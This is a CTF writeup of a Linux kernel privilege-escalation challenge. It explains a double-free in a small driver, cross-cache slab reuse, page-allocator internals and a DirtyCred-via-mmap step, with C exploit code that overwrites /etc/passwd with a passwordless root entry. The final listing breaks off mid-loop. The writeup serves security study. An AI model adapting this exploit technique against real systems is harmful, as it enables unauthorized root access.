Last weekend, I played the HITCON CTF qualifiers as part of the Blue Water team, and we managed to take first place, earning a spot in the finals.
Below is my writeup for one of the pwn challenges, “Full Chain - Wall Rose”.
Pwn
Full Chain - Wall Rose
Description
Challenge:
You have a busybox shell running as user user
/home/user/rose.ko is a vulnerable kernel driver
Try exploiting /home/user/rose.ko to achieve privilege escalation
You may assume that Busybox, the Linux kernel, and Qemu are not vulnerable.
Notes:
FG-KASLR is enabled
Your exploit should be kernel-agnostic. In other words, it should not rely on any kernel offsets
Author: wxrdnx
Initial Analysis
In this challenge, we were provided with the source code of a vulnerable kernel driver named rose.c to analyze. Here’s the source code:
#include <linux/atomic.h>
#include <linux/device.h>
#include <linux/fs.h>
#include <linux/init.h>
#include <linux/kernel.h>
#include <linux/miscdevice.h>
#include <linux/module.h>
#include <linux/slab.h>
#include <linux/uaccess.h>
#include <asm/errno.h>
#include <linux/printk.h>

#define MAX_DATA_HEIGHT 0x400

MODULE_AUTHOR("wxrdnx");
MODULE_LICENSE("GPL");
MODULE_DESCRIPTION("Wall Rose");

static char *data;

static int rose_open(struct inode *inode, struct file *file)
{
    data = kmalloc(MAX_DATA_HEIGHT, GFP_KERNEL);
    if (!data) {
        printk(KERN_ERR "Wall Rose: kmalloc error\n");
        return -1;
    }
    memset(data, 0, MAX_DATA_HEIGHT);
    return 0;
}

static int rose_release(struct inode *inode, struct file *file)
{
    kfree(data);
    return 0;
}

static ssize_t rose_read(struct file *filp, char __user *buffer, size_t length, loff_t *offset)
{
    pr_info("Wall Rose: data dropped");
    return 0;
}

static ssize_t rose_write(struct file *filp, const char __user *buffer, size_t length, loff_t *offset)
{
    pr_info("Wall Rose: data dropped");
    return 0;
}

static struct file_operations rose_fops = {
    .owner = THIS_MODULE,
    .open = rose_open,
    .release = rose_release,
    .read = rose_read,
    .write = rose_write,
};

static struct miscdevice rose_device = {
    .minor = MISC_DYNAMIC_MINOR,
    .name = "rose",
    .fops = &rose_fops,
};

static int __init rose_init(void)
{
    return misc_register(&rose_device);
}

static void __exit rose_exit(void)
{
    misc_deregister(&rose_device);
}

module_init(rose_init);
module_exit(rose_exit);
We discovered that our interactions with the driver were limited to open and close operations. The bug we identified was rather straightforward: data is a single global pointer, so every file descriptor opened on the driver shares the same data chunk. Closing the previously opened file descriptors therefore calls kfree on the same pointer multiple times, giving us a use-after-free (and double-free) condition.
However, since read and write are stubs, we could neither read from nor write to the chunk. Given this constraint, our next step was to craft a strategy for successful exploitation.
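To make the primitive concrete, here is a minimal sketch of the bug in isolation (just an illustration, not part of the final exploit):

#include <fcntl.h>
#include <unistd.h>

int main(void)
{
    // Both descriptors share the driver's single global `data` pointer.
    int fd1 = open("/dev/rose", O_RDWR);  // data = A
    int fd2 = open("/dev/rose", O_RDWR);  // data = B (the pointer to A is simply lost)
    close(fd1);                           // rose_release: kfree(B)
    close(fd2);                           // rose_release: kfree(B) again -> double free / UAF
    return 0;
}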
Solution
I worked on this challenge alongside two of my teammates, sampriti and cru5h. This challenge forms a part of the full chain challenge. The challenge notes encouraged us to develop an exploit that was kernel-agnostic, taking into consideration the presence of FG-KASLR as well. Thus, we set out to devise an exploit stable enough for future use.
Given the UAF scenario, we opted to explore cross-cache exploitation, which seemed promising since we would not require a leak later on, and it promised to be kernel-agnostic as well.
The bug identified was a UAF in kmalloc-1k. We resolved to pursue cross-cache exploitation, allowing the chunk to be utilized by other objects of varying sizes. We targeted the file structure, planning to later trigger the DirtyCred technique.
Analyzing last year’s writeup along with the CVE-2022-29582 writeup greatly improved my grasp of the exploitation techniques involved. Both resources were new to me; they offered clear guidance on navigating the page allocator and included a practical abstraction for performing cross-cache exploitation. I strongly recommend reading them to gain a deeper understanding of the technique.
To offer some background, the Linux kernel features a slab allocator named SLUB that manages caches of kernel heap objects. Each slab holds objects of a single size, and each slab is backed by one or more pages obtained from the page allocator. The need for a cross-cache attack arises from two attributes of the file object:
It has a size of 256 bytes.
It is housed in a dedicated cache named filp.
The UAF vulnerability we had was located in kmalloc-1k, while the file struct lives in its own dedicated cache. So even if our UAF object had the same size as the file struct, we would still need a cross-cache attack, since rose objects are allocated from the general-purpose caches.
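As a quick sanity check (a sketch for a local debugging setup; /proc/slabinfo typically requires root), you can confirm that file objects live in their own cache and see its object size via the SLUB sysfs interface:

cat /sys/kernel/slab/filp/object_size    # 256 on this kernel
grep '^filp' /proc/slabinfo              # objsize / objperslab / pagesperslab for the filp cache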
Now that we have this knowledge, as outlined in the aforementioned writeup, the initial step is to discard a slab that houses our rose object. The procedure to accomplish this is clearly explained in Ruia’s writeup. The first task is to determine the values of OBJS_PER_SLAB and CPU_PARTIAL for kmalloc-1k. To verify these values, we can execute the following commands:
cat /sys/kernel/slab/kmalloc-1k/objs_per_slab
cat /sys/kernel/slab/kmalloc-1k/cpu_partial
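On the challenge kernel these matched the values we later hard-code in the exploit (OBJS_PER_SLAB = 8, CPU_PARTIAL = 24):

$ cat /sys/kernel/slab/kmalloc-1k/objs_per_slab
8
$ cat /sys/kernel/slab/kmalloc-1k/cpu_partial
24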
Now, let’s start crafting the exploit. We adapted the abstraction provided in last year’s writeup to trigger the cross-cache.
//gcc -pthread -no-pie -static ../../exploit.c -o exp
#define _GNU_SOURCE
#include <assert.h>
#include <fcntl.h>
#include <errno.h>
#include <inttypes.h>
#include <limits.h>
#include <pthread.h>
#include <signal.h>
#include <stdbool.h>
#include <stddef.h>
#include <stdint.h>
#include <stdio.h>
#include <stdlib.h>
#include <poll.h>
#include <stdnoreturn.h>
#include <string.h>
#include <unistd.h>
#include <linux/userfaultfd.h>
#include <sys/ioctl.h>
#include <sys/ipc.h>
#include <sys/mman.h>
#include <sys/msg.h>
#include <sys/stat.h>
#include <sys/syscall.h>
#include <sys/timerfd.h>
#include <sys/wait.h>
#include <sys/types.h>
#include <sys/resource.h>
#include <linux/capability.h>
#include <sys/xattr.h>
#include <linux/io_uring.h>
#include <linux/membarrier.h>

#define logd(fmt, ...) fprintf(stderr, (fmt), ##__VA_ARGS__)
#define CC_OVERFLOW_FACTOR 5 // Used to handle fragmentation
#define OBJS_PER_SLAB 8 // Fetch this from /sys/kernel/slab/kmalloc-1k/objs_per_slab
#define CPU_PARTIAL 24 // Fetch this from /sys/kernel/slab/kmalloc-1k/cpu_partial
#define MSG_SIZE 0x400-48 // kmalloc-1k (because CONFIG_MEMCG_KMEM is disabled, we can use msg_msg)
static noreturn void fatal(const char *msg) {
    perror(msg);
    exit(EXIT_FAILURE);
}

/*
Cross-cache abstraction taken from https://org.anize.rs/HITCON-2022/pwn/fourchain-kernel
Note that we made minor adjustments to the abstraction
*/
enum {
    CC_RESERVE_PARTIAL_LIST = 0,
    CC_ALLOC_VICTIM_PAGE,
    CC_FILL_VICTIM_PAGE,
    CC_EMPTY_VICTIM_PAGE,
    CC_OVERFLOW_PARTIAL_LIST
};

struct cross_cache {
    uint32_t objs_per_slab;
    uint32_t cpu_partial;
    struct {
        int64_t *overflow_objs;
        int64_t *pre_victim_objs;
        int64_t *post_victim_objs;
    };
    uint8_t phase;
    int (*allocate)(int64_t);
    int (*free)(int64_t);
};

static struct cross_cache *kmalloc1k_cc;

static inline int64_t cc_allocate(struct cross_cache *cc, int64_t *repo, uint32_t to_alloc) {
    for (uint32_t i = 0; i < to_alloc; i++) {
        int64_t ref = cc->allocate(i);
        if (ref == -1)
            return -1;
        repo[i] = ref;
    }
    return 0;
}

static inline int64_t cc_free(struct cross_cache *cc, int64_t *repo, uint32_t to_free, bool per_slab) {
    for (uint32_t i = 0; i < to_free; i++) {
        // If per_slab is true, the target is to free one object per slab.
        if (per_slab && (i % (cc->objs_per_slab - 1)))
            continue;
        if (repo[i] == -1)
            continue;
        cc->free(repo[i]);
        repo[i] = -1;
    }
    return 0;
}

static inline int64_t reserve_partial_list_amount(struct cross_cache *cc) {
    uint32_t to_alloc = cc->objs_per_slab * (cc->cpu_partial + 1) * CC_OVERFLOW_FACTOR;
    cc_allocate(cc, cc->overflow_objs, to_alloc);
    return 0;
}

static inline int64_t allocate_victim_page(struct cross_cache *cc) {
    uint32_t to_alloc = cc->objs_per_slab - 1;
    cc_allocate(cc, cc->pre_victim_objs, to_alloc);
    return 0;
}

static inline int64_t fill_victim_page(struct cross_cache *cc) {
    uint32_t to_alloc = cc->objs_per_slab + 1;
    cc_allocate(cc, cc->post_victim_objs, to_alloc);
    return 0;
}

static inline int64_t empty_victim_page(struct cross_cache *cc) {
    uint32_t to_free = cc->objs_per_slab - 1;
    cc_free(cc, cc->pre_victim_objs, to_free, false);
    to_free = cc->objs_per_slab + 1;
    cc_free(cc, cc->post_victim_objs, to_free, false);
    return 0;
}

static inline int64_t overflow_partial_list(struct cross_cache *cc) {
    uint32_t to_free = cc->objs_per_slab * (cc->cpu_partial + 1) * CC_OVERFLOW_FACTOR;
    cc_free(cc, cc->overflow_objs, to_free, true);
    return 0;
}

static inline int64_t free_all(struct cross_cache *cc) {
    uint32_t to_free = cc->objs_per_slab * (cc->cpu_partial + 1) * CC_OVERFLOW_FACTOR;
    cc_free(cc, cc->overflow_objs, to_free, false);
    empty_victim_page(cc);
    return 0;
}

int64_t cc_next(struct cross_cache *cc) {
    switch (cc->phase++) {
    case CC_RESERVE_PARTIAL_LIST:
        return reserve_partial_list_amount(cc);
    case CC_ALLOC_VICTIM_PAGE:
        return allocate_victim_page(cc);
    case CC_FILL_VICTIM_PAGE:
        return fill_victim_page(cc);
    case CC_EMPTY_VICTIM_PAGE:
        return empty_victim_page(cc);
    case CC_OVERFLOW_PARTIAL_LIST:
        return overflow_partial_list(cc);
    default:
        return 0;
    }
}

void cc_deinit(struct cross_cache *cc) {
    free_all(cc);
    free(cc->overflow_objs);
    free(cc->pre_victim_objs);
    free(cc->post_victim_objs);
    free(cc);
}

void init_msq(int64_t *repo, uint32_t to_alloc) {
    for (int i = 0; i < to_alloc; i++) {
        repo[i] = msgget(IPC_PRIVATE, IPC_CREAT | 0666);
        if (repo[i] < 0) {
            logd("[-] msgget() fail\n");
            exit(-1);
        }
    }
}

struct cross_cache *cc_init(uint32_t objs_per_slab, uint32_t cpu_partial, void *allocate_fptr, void *free_fptr) {
    struct cross_cache *cc = malloc(sizeof(struct cross_cache));
    if (!cc) {
        perror("init_cross_cache:malloc\n");
        return NULL;
    }
    cc->objs_per_slab = objs_per_slab;
    cc->cpu_partial = cpu_partial;
    cc->free = free_fptr;
    cc->allocate = allocate_fptr;
    cc->phase = CC_RESERVE_PARTIAL_LIST;
    uint32_t n_overflow = objs_per_slab * (cpu_partial + 1) * CC_OVERFLOW_FACTOR;
    uint32_t n_previctim = objs_per_slab - 1;
    uint32_t n_postvictim = objs_per_slab + 1;
    cc->overflow_objs = malloc(sizeof(int64_t) * n_overflow);
    cc->pre_victim_objs = malloc(sizeof(int64_t) * n_previctim);
    cc->post_victim_objs = malloc(sizeof(int64_t) * n_postvictim);
    init_msq(cc->overflow_objs, n_overflow);
    init_msq(cc->pre_victim_objs, n_previctim);
    init_msq(cc->post_victim_objs, n_postvictim);
    return cc;
}

static int rlimit_increase(int rlimit) {
    struct rlimit r;
    if (getrlimit(rlimit, &r))
        fatal("rlimit_increase:getrlimit");
    if (r.rlim_max <= r.rlim_cur) {
        printf("[+] rlimit %d remains at %lld\n", rlimit, r.rlim_cur);
        return 0;
    }
    r.rlim_cur = r.rlim_max;
    int res;
    if ((res = setrlimit(rlimit, &r)))
        fatal("rlimit_increase:setrlimit");
    else
        printf("[+] rlimit %d increased to %lld\n", rlimit, r.rlim_max);
    return res;
}

static int64_t cc_alloc_kmalloc1k_msg(int64_t msqid) {
    struct {
        long mtype;
        char mtext[MSG_SIZE];
    } msg;
    msg.mtype = 1;
    memset(msg.mtext, 0x41, MSG_SIZE - 1);
    msg.mtext[MSG_SIZE - 1] = 0;
    msgsnd(msqid, &msg, sizeof(msg.mtext), 0);
    return msqid;
}

static void cc_free_kmalloc1k_msg(int64_t msqid) {
    struct {
        long mtype;
        char mtext[MSG_SIZE];
    } msg;
    msg.mtype = 0;
    msgrcv(msqid, &msg, sizeof(msg.mtext), 0, IPC_NOWAIT | MSG_NOERROR);
}

int open_rose() {
    return open("/dev/rose", O_RDWR);
}
Above is the modified version of the script we used. We made a couple of adjustments from the original script, including:
In the cc_free section, we made it so that when per_slab is flagged as true, it only frees one object per slab.
For the object spray, since CONFIG_MEMCG_KMEM is disabled in this kernel, we can use msg_msg objects to fill kmalloc-1k. (If that option were enabled, msg_msg would be allocated from the separate accounted kmalloc-cg caches rather than the same cache as rose, so we would need a different object to spray with.)
Now that we’ve identified the specifics regarding the number of objects required to fill a slab and the count of slabs necessary to fill the CPU partial list, it’s time to initiate the discard slab process. Taking a cue from the guidelines in the write-up, here is what we need to do to trigger a discard_slab:
Start by allocating a significant number of slabs, exceeding the upper limit defined by CPU_PARTIAL.
Then, focus on the target slab we aim to discard. Allocate into it without filling it completely, leaving room to allocate the rose object later.
Next, allocate the rose object, which, ideally, should find a place in the slab we prepared in the previous step.
Moving forward, fill up the target slab until it’s full, activating a new slab in the process.
The next move is to empty our target slab. This involves releasing the rose object along with others that are housed within the slab.
Now, with an empty target slab at hand, we free up at least one object from the other slabs that are not active at the moment.
The objective here is to max out the partial list, a condition met when it holds CPU_PARTIAL number of slabs.
Presuming the partial list is filled to capacity, freeing an additional object from a non-active slab (also not part of the partial list) activates unfreeze_partials.
This function scans through the slabs in the partial list, discarding any that are found empty.
Bear in mind that we emptied our chosen slab (slab of the rose object) earlier. This means that during the above step, our slab gets discarded, making its way to the freelist.
To put this all into action, we’ll use the abstraction we described earlier. Here’s how the code looks:
int rose_fds[2];
int freed_fd = -1;

#define NUM_SPRAY_FDS 0x300

int main(void) {
    puts("=======================");
    puts("[+] Initial setup");
    system("echo 'AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA' > /tmp/a");
    rlimit_increase(RLIMIT_NOFILE);

    // Alloc the first rose
    // This will be used later to trigger double free
    rose_fds[0] = open_rose();

    puts("=======================");
    puts("[+] Try to free the page");
    // Based on https://ruia-ruia.github.io/2022/08/05/CVE-2022-29582-io-uring/
    kmalloc1k_cc = cc_init(OBJS_PER_SLAB, CPU_PARTIAL, cc_alloc_kmalloc1k_msg, cc_free_kmalloc1k_msg);

    // Step 1
    puts("[+] Step 1: Allocate a lot of slabs (To be put in the partial list later)");
    cc_next(kmalloc1k_cc);

    // Step 2
    puts("[+] Step 2: Allocate target slab that we want to discard");
    cc_next(kmalloc1k_cc);

    // Step 3
    puts("[+] Step 3: Put rose in the target slab");
    rose_fds[1] = open_rose();

    // Step 4
    puts("[+] Step 4: Fulfill the target slab until we have a new active slab");
    cc_next(kmalloc1k_cc);

    // Step 5
    puts("[+] Step 5: Try to free rose & other objects with hope that the target slab will be empty + be put in the partial list");
    // Free rose, but rose_fds[0] is also pointing to the same chunk,
    // and we can use rose_fds[0] later to free another chunk that resides here
    close(rose_fds[1]);
    cc_next(kmalloc1k_cc);

    // Step 6
    puts("[+] Step 6: Fulfill the partial list and discard the target slab (because it's empty) to per_cpu_pages");
    cc_next(kmalloc1k_cc);
}
Some extra notes:
We’ve created a file called /tmp/a, which we plan to use later to trigger the DirtyCred technique.
Importantly, we allocate the first rose object before setting up the cross-cache machinery. We want two file descriptors whose release both free the same chunk, so that we can trigger a double free later on.
After executing the code above, the targeted slab should in theory be discarded and its page returned to the page allocator’s freelist. To debug this, I set breakpoints in both rose_release and discard_slab, grabbed the data address, and confirmed that discard_slab was indeed discarding the slab containing the rose data.
However, during the competition, my file-object spray failed to land on the previously discarded slab’s page (the page somehow wasn’t being recycled). Checking /proc/slabinfo, I discovered that kmalloc-1k slabs are backed by order-1 pages, while the filp cache (256-byte file objects) uses order-0 pages.
Initially, based on another writeup on page-level heap feng shui, I presumed that when the order-0 freelist is empty, the allocator falls back to splitting pages from higher-order freelists, which in this case would include our discarded page. Although this is accurate, I had overlooked a crucial step.
My teammate cru5h pointed out that the page we released earlier still resided in the per_cpu_pages (pcp) freelist, and that we needed to push it further so it would reach the buddy system’s free area. In the buddy allocator, when a lower-order free area is empty, pages are split from a higher-order free area (exactly the behavior we were counting on). He helped me with this part and provided a working script that returns the freed page to the buddy system.
On a side note, I took a deep dive into the Linux kernel code that discards a slab, which helped me a lot in understanding this issue.
static void discard_slab(struct kmem_cache *s, struct slab *slab)
{
    ...
    free_slab(s, slab);
}

static void free_slab(struct kmem_cache *s, struct slab *slab)
{
    ...
    __free_slab(s, slab);
}

static void __free_slab(struct kmem_cache *s, struct slab *slab)
{
    struct folio *folio = slab_folio(slab);
    int order = folio_order(folio);
    int pages = 1 << order;
    ...
    __free_pages(folio_page(folio, 0), order);
}

void __free_pages(struct page *page, unsigned int order)
{
    /* get PageHead before we drop reference */
    int head = PageHead(page);

    if (put_page_testzero(page))
        free_the_page(page, order);
    else if (!head)
        while (order-- > 0)
            free_the_page(page + (1 << order), order);
}

static inline void free_the_page(struct page *page, unsigned int order)
{
    if (pcp_allowed_order(order))      /* Via pcp? */
        free_unref_page(page, order);
    else
        __free_pages_ok(page, order, FPI_NONE);
}

void free_unref_page(struct page *page, unsigned int order)
{
    ...
    pcp = pcp_spin_trylock_irqsave(zone->per_cpu_pageset, flags);
    if (pcp) {
        free_unref_page_commit(zone, pcp, page, migratetype, order);
        pcp_spin_unlock_irqrestore(pcp, flags);
    } else {
        free_one_page(zone, page, pfn, order, migratetype, FPI_NONE);
    }
    pcp_trylock_finish(UP_flags);
}

static void free_unref_page_commit(struct zone *zone, struct per_cpu_pages *pcp,
                                   struct page *page, int migratetype,
                                   unsigned int order)
{
    int high;
    int pindex;
    bool free_high;

    __count_vm_events(PGFREE, 1 << order);
    pindex = order_to_pindex(migratetype, order);
    list_add(&page->pcp_list, &pcp->lists[pindex]);
    pcp->count += 1 << order;

    /*
     * As high-order pages other than THP's stored on PCP can contribute
     * to fragmentation, limit the number stored when PCP is heavily
     * freeing without allocation. The remainder after bulk freeing
     * stops will be drained from vmstat refresh context.
     */
    free_high = (pcp->free_factor && order && order <= PAGE_ALLOC_COSTLY_ORDER);

    high = nr_pcp_high(pcp, zone, free_high);
    if (pcp->count >= high) {
        int batch = READ_ONCE(pcp->batch);

        free_pcppages_bulk(zone, nr_pcp_free(pcp, high, batch, free_high), pcp, pindex);
    }
}

static void free_pcppages_bulk(struct zone *zone, int count,
                               struct per_cpu_pages *pcp, int pindex)
{
    ...
    __free_one_page(page, page_to_pfn(page), zone, order, mt, FPI_NONE);
    ...
}

/*
 * Freeing function for a buddy system allocator.
 */
static inline void __free_one_page(struct page *page, unsigned long pfn,
                                   struct zone *zone, unsigned int order,
                                   int migratetype, fpi_t fpi_flags)
{
    ...
}
When a slab is discarded, discard_slab eventually reaches free_unref_page_commit, which adds the freed page to the per-CPU pcp list. Importantly, only once the number of pages in that list exceeds a threshold (nr_pcp_high) does free_pcppages_bulk run and return the pages to the buddy system’s free area.
Additionally, I’d like to highlight the importance of returning the freed page back to the buddy system’s free area. This is necessary because, at some stage during the slab allocation process, the get_page_from_freelist function will be invoked.
static struct page *get_page_from_freelist(gfp_t gfp_mask, unsigned int order,
                                           int alloc_flags,
                                           const struct alloc_context *ac)
{
    ...
try_this_zone:
    page = rmqueue(ac->preferred_zoneref->zone, zone, order,
                   gfp_mask, alloc_flags, ac->migratetype);
    if (page) {
        prep_new_page(page, order, gfp_mask, alloc_flags);
    ...
}

/*
 * Allocate a page from the given zone.
 * Use pcplists for THP or "cheap" high-order allocations.
 */
/*
 * Do not instrument rmqueue() with KMSAN. This function may call
 * __msan_poison_alloca() through a call to set_pfnblock_flags_mask().
 * If __msan_poison_alloca() attempts to allocate pages for the stack depot, it
 * may call rmqueue() again, which will result in a deadlock.
 */
__no_sanitize_memory
static inline struct page *rmqueue(struct zone *preferred_zone,
                                   struct zone *zone, unsigned int order,
                                   gfp_t gfp_flags, unsigned int alloc_flags,
                                   int migratetype)
{
    struct page *page;
    ...
    if (likely(pcp_allowed_order(order))) {
        /*
         * MIGRATE_MOVABLE pcplist could have the pages on CMA area and
         * we need to skip it when CMA area isn't allowed.
         */
        if (!IS_ENABLED(CONFIG_CMA) || alloc_flags & ALLOC_CMA ||
            migratetype != MIGRATE_MOVABLE) {
            page = rmqueue_pcplist(preferred_zone, zone, order,
                                   migratetype, alloc_flags);
            if (likely(page))
                goto out;
        }
    }

    page = rmqueue_buddy(preferred_zone, zone, order, alloc_flags, migratetype);
    ...
    return page;
}

/* Lock and remove page from the per-cpu list */
static struct page *rmqueue_pcplist(struct zone *preferred_zone,
                                    struct zone *zone, unsigned int order,
                                    int migratetype, unsigned int alloc_flags)
{
    ...
    list = &pcp->lists[order_to_pindex(migratetype, order)];
    page = __rmqueue_pcplist(zone, order, migratetype, alloc_flags, pcp, list);
    ...
}

static __always_inline struct page *rmqueue_buddy(struct zone *preferred_zone,
                                                  struct zone *zone,
                                                  unsigned int order,
                                                  unsigned int alloc_flags,
                                                  int migratetype)
{
    ...
    if (order > 0 && alloc_flags & ALLOC_HARDER)
        page = __rmqueue_smallest(zone, order, MIGRATE_HIGHATOMIC);
    ...
}

static __always_inline struct page *__rmqueue_smallest(struct zone *zone,
                                                       unsigned int order,
                                                       int migratetype)
{
    ...
    /* Find a page of the appropriate size in the preferred list */
    for (current_order = order; current_order < MAX_ORDER; ++current_order) {
        area = &(zone->free_area[current_order]);
        page = get_page_from_free_area(area, migratetype);
        ...
        return page;
    }
    ...
}
Observe that the allocator first attempts to retrieve a page from the pcp freelist before falling back to the buddy system’s free area. Inside rmqueue_pcplist, the list is selected by order, while rmqueue_buddy (which eventually calls __rmqueue_smallest) iterates over the freelists from the requested order up to MAX_ORDER. Hence, from what I understand, an order-0 allocation served from the pcp list never consults the higher-order freelists. This is why we need to make sure the previously discarded slab’s page is moved back to the buddy system first.
How do we achieve this? As mentioned earlier, we can fill up the pcp_list which would prompt the free_unref_page_commit function to release the pages back into the buddy system.
To initiate this, we can add an extra step where we simply release all the objects we previously sprayed, with the expectation that this will fill up the pcp_list and allow our page to be released back into the buddy system.
// Step 7
puts("[+] Step 7: Make PCP freelist full, so that page goes to free area in buddy");
cc_deinit(kmalloc1k_cc);
// We try to make the page stored in pcp go to the free area by making
// the pcp freelist full.
// Free all allocations that we've made before to trigger it, and after that
// we can start our cross-cache exploitation.
Now that we’ve managed to return the page to the buddy system, it’s time to trigger the DirtyCred technique. We plan to use a strategy we learned from n0psledbyte during the zer0pts CTF. He demonstrated an easier method using mmap instead of a race condition in the write syscall to achieve this.
To recap our current situation: we still have one rose file descriptor (FD) whose data pointer lies inside the freed page. Next, we create numerous file objects, hoping that a new filp slab will be allocated from that freed page, so that one of the newly created file objects overlaps the chunk still referenced by our remaining rose FD. Let’s execute this spray.
puts("=======================");
puts("[+] Start the main exploit");

// Trigger cross-cache, file will use the freed page
puts("[+] Spray FDs");
int spray_fds[NUM_SPRAY_FDS];
for (int i = 0; i < NUM_SPRAY_FDS; i++) {
    spray_fds[i] = open("/tmp/a", O_RDWR); // /tmp/a is a writable file
    if (spray_fds[i] == -1)
        fatal("Failed to open FDs");
}
Note that a file object is 256 bytes, which evenly divides the 1024-byte rose object. This ensures that if a new slab for file objects is created from our freed page, at least one file object will start at exactly the same address as our dangling rose chunk.
After the spray, we close the remaining rose FD, which kfrees the chunk now occupied by one of the files we just sprayed. Next, to determine which index of spray_fds shares that chunk, we spray additional file descriptors, hoping that one of the newly created file objects reuses the chunk we just released through rose.
// Spray to replace the previously freed chunk
// Set the lseek to 0x8, so that we can easily find the fd
puts("[+] Find the freed FD using lseek");
int spray_fds_2[NUM_SPRAY_FDS];
for (int i = 0; i < NUM_SPRAY_FDS; i++) {
    spray_fds_2[i] = open("/tmp/a", O_RDWR);
    lseek(spray_fds_2[i], 0x8, SEEK_SET);
}
// After: 2 fd 1 refcount (Because new file)
Note that we lseek every spray_fds_2 descriptor to offset 0x8. One of them reuses the struct file we just freed through rose, so the corresponding spray_fds entry (which shares that struct file) will see its offset change to 0x8 as well, letting us identify the right index. Let’s proceed to locate it.
// The freed fd will have its lseek value set to 0x8. Try to find it.
for (int i = 0; i < NUM_SPRAY_FDS; i++) {
    if (lseek(spray_fds[i], 0, SEEK_CUR) == 0x8) {
        freed_fd = spray_fds[i];
        lseek(freed_fd, 0x0, SEEK_SET);
        printf("[+] Found freed fd: %d\n", freed_fd);
        break;
    }
}
if (freed_fd == -1)
    fatal("Failed to find FD");
If we manage to identify it, it means that the cross-cache operations have been successfully completed. To trigger the DirtyCred, we simply need to call mmap on the freed_fd, then close it, followed by closing all instances of spray_fds_2.
// mmap trick instead of race with write
puts("[+] DirtyCred via mmap");
char *file_mmap = mmap(NULL, 0x1000, PROT_READ | PROT_WRITE, MAP_SHARED, freed_fd, 0); // After: 3 fd 2 refcount (Because new file)
close(freed_fd); // After: 2 fd 1 refcount (Because new file)
for (int i = 0; i < NUM_SPRAY_FDS; i++) {
    close(spray_fds_2[i]);
}
// After: 1 fd 0 refcount (Because new file)

// Effect: FD in mmap (which is writeable) can be replaced with an RDONLY file
for (int i = 0; i < NUM_SPRAY_FDS; i++) {
    spray_fds[i] = open("/etc/passwd", O_RDONLY);
}
// After: 2 fd 1 refcount (but writeable due to mmap)
strcpy(file_mmap, "root::0:0:root:/root:/bin/sh\n");
At this point, because of the earlier double free, the file object’s refcount drops to zero once spray_fds_2 is closed, so the struct file is released even though our writable mapping still references it.
As a final step, we spray once more, this time opening the read-only file /etc/passwd, hoping that one of the newly created file objects reuses the chunk our mapping still references. Since the mapping was created writable, writing to it now writes into /etc/passwd even though we only opened it read-only. Overwriting /etc/passwd with a passwordless root entry gives us privilege escalation :).
Putting everything together, here is the final exploit. The includes, defines, and helper functions (the cross-cache abstraction, cc_init/cc_next/cc_deinit, the msg_msg spray helpers, rlimit_increase, fatal, and open_rose) are identical to the listing shown earlier; below is the complete main() with all of the steps in order:

//gcc -pthread -no-pie -static ../../exploit.c -o exp

int rose_fds[2];
int freed_fd = -1;

#define NUM_SPRAY_FDS 0x300

int main(void) {
    puts("=======================");
    puts("[+] Initial setup");
    system("echo 'AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA' > /tmp/a");
    rlimit_increase(RLIMIT_NOFILE);

    // Alloc the first rose
    // This will be used later to trigger double free
    rose_fds[0] = open_rose();

    puts("=======================");
    puts("[+] Try to free the page");
    // Based on https://ruia-ruia.github.io/2022/08/05/CVE-2022-29582-io-uring/
    kmalloc1k_cc = cc_init(OBJS_PER_SLAB, CPU_PARTIAL, cc_alloc_kmalloc1k_msg, cc_free_kmalloc1k_msg);

    // Step 1
    puts("[+] Step 1: Allocate a lot of slabs (To be put in the partial list later)");
    cc_next(kmalloc1k_cc);

    // Step 2
    puts("[+] Step 2: Allocate target slab that we want to discard");
    cc_next(kmalloc1k_cc);

    // Step 3
    puts("[+] Step 3: Put rose in the target slab");
    rose_fds[1] = open_rose();

    // Step 4
    puts("[+] Step 4: Fulfill the target slab until we have a new active slab");
    cc_next(kmalloc1k_cc);

    // Step 5
    puts("[+] Step 5: Try to free rose & other objects with hope that the target slab will be empty + be put in the partial list");
    // Free rose, but rose_fds[0] is also pointing to the same chunk,
    // and we can use rose_fds[0] later to free another chunk that resides here
    close(rose_fds[1]);
    cc_next(kmalloc1k_cc);

    // Step 6
    puts("[+] Step 6: Fulfill the partial list and discard the target slab (because it's empty) to per_cpu_pages");
    cc_next(kmalloc1k_cc);
    // The page (order 1) will be discarded, and it goes to per_cpu_pages
    // (__free_pages -> free_the_page -> free_unref_page -> free_unref_page_commit)
    // We need to make it go to the free area instead of per_cpu_pages

    // Step 7
    puts("[+] Step 7: Make PCP freelist full, so that page goes to free area in buddy");
    cc_deinit(kmalloc1k_cc);
    // We try to make the page stored in pcp go to the free area by making
    // the pcp freelist full.
    // Free all allocations that we've made before to trigger it, and after that
    // we can start our cross-cache exploitation.

    puts("=======================");
    puts("[+] Start the main exploit");

    // Trigger cross-cache, file will use the freed page
    puts("[+] Spray FDs");
    int spray_fds[NUM_SPRAY_FDS];
    for (int i = 0; i < NUM_SPRAY_FDS; i++) {
        spray_fds[i] = open("/tmp/a", O_RDWR); // /tmp/a is a writable file
        if (spray_fds[i] == -1)
            fatal("Failed to open FDs");
    }
    // Before: 2 fd 1 refcount (rose_fds[1] & spray_fds[i])

    puts("[+] Free one of the FDs via rose");
    close(rose_fds[0]); // After: 1 fd but pointed chunk is free

    // Spray to replace the previously freed chunk
    // Set the lseek to 0x8, so that we can easily find the fd
    puts("[+] Find the freed FD using lseek");
    int spray_fds_2[NUM_SPRAY_FDS];
    for (int i = 0; i < NUM_SPRAY_FDS; i++) {
        spray_fds_2[i] = open("/tmp/a", O_RDWR);
        lseek(spray_fds_2[i], 0x8, SEEK_SET);
    }
    // After: 2 fd 1 refcount (Because new file)

    // The freed fd will have its lseek value set to 0x8. Try to find it.
    for (int i = 0; i < NUM_SPRAY_FDS; i++) {
        if (lseek(spray_fds[i], 0, SEEK_CUR) == 0x8) {
            freed_fd = spray_fds[i];
            lseek(freed_fd, 0x0, SEEK_SET);
            printf("[+] Found freed fd: %d\n", freed_fd);
            break;
        }
    }
    if (freed_fd == -1)
        fatal("Failed to find FD");

    // mmap trick instead of race with write
    puts("[+] DirtyCred via mmap");
    char *file_mmap = mmap(NULL, 0x1000, PROT_READ | PROT_WRITE, MAP_SHARED, freed_fd, 0); // After: 3 fd 2 refcount (Because new file)
    close(freed_fd); // After: 2 fd 1 refcount (Because new file)
    for (int i = 0; i < NUM_SPRAY_FDS; i++) {
        close(spray_fds_2[i]);
    }
    // After: 1 fd 0 refcount (Because new file)

    // Effect: FD in mmap (which is writeable) can be replaced with an RDONLY file
    for (int i = 0; i < NUM_SPRAY_FDS; i++) {
